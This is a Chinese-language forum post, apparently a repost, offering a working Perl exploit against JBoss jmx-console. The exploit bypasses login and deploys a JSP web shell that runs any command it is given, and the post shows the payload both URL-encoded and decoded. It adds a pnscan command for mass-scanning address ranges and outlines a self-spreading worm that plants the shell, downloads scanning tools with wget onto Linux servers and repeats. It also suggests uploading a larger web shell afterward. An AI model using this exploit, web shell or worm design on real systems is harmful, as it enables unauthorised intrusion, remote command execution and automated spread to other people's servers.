jboss HEAD exp

发一下最近整理的一个小东西吧。JBOSS蠕虫。。。

首先发一个exp

#!/usr/bin/perl use IO::Socket; print "JBoss Exp...\n"; if(@ARGV!=2){ print "perl $0 \n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $xkcmd = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=xk.war&argType=java.lang.String&arg1=xk&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True HTTP/1.0\r\n\r\n"; my $exp = new IO::Socket::INET(PeerAddr=>$ip, PeerPort=>$port, TimeOut=>120); print $exp $xkcmd;

解出来是这样的：

#!/usr/bin/perl use IO::Socket; print "JBoss Exp...\n"; if(@ARGV!=2){ print "perl $0 \n"; exit; } $ip = $ARGV[0]; $port = $ARGV[1]; $xkcmd = "HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=xk.war&argType=java.lang.String&arg1=xk&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=<%@ page import="java.util.*,java.io.*"%> <% %>

 <% if (request.getParameter("comment") != null) { out.println("Command: " + request.getParameter("comment") + "
"); Process p = Runtime.getRuntime().exec(request.getParameter("comment")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %> 

&argType=boolean&arg4=True HTTP/1.0\r\n\r\n"; my $exp = new IO::Socket::INET(PeerAddr=>$ip, PeerPort=>$port, TimeOut=>120); print $exp $xkcmd;

作用是突破JBoss的登陆验证，上传一个小马  /xk/xk.jsp

下面大家看一下JBoss蠕虫的代码。 原理给大家简单的说一下。首先通过pnscan来扫描使用JBoss的服务器。

./pnscan -r JBoss -w \”HEAD / HTTP/1.0\\r\\n\\r\\n\” -t 6500 $partx.$party.0.0/16 80 > /tmp/xxxxx

然后使用我上面发的这个EXP，传马。然后选择Linux的服务器，通过WGET下载一个压缩包，包里面其实就是pnscan和几个perl的脚本。然后循环下去。。。。

我写这个文章的目的主要是1，方便大家日后再内网渗透的时候遇到JBoss，可以多一个思路。2，大家可以研究一下蠕虫病毒的原理。

文章结束啦，又不是什么新东西，就随便发发，低调。。。顺便说一下，如果这个JSP的小马，不方便的话，可以换成一个JSP的一句话shell，然后再POST一个大马上去。

转载：http://www.myhack58.com/Article/html/3/8/2013/37551.htm